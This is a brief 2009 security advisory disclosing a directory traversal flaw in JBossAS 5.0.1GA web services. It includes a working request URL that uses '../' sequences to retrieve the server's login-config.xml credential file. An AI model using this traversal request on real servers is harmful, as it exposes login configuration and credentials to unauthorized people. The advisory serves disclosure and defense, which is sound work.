Computer Security

Security Advisory: Jboss dir.traversal
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  JBoss directory traversal

From:failer
Date:19.04.2009
Subject:Jboss dir.traversal

JBossAS 5.0.1GA
Simple webservice "hello" from docs + imported XSD-schema.
Any user can get ANY XML from server:
http://127.0.0.1:8080/echo/Echo?wsdl&resource=../../../conf/login-config.xml
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru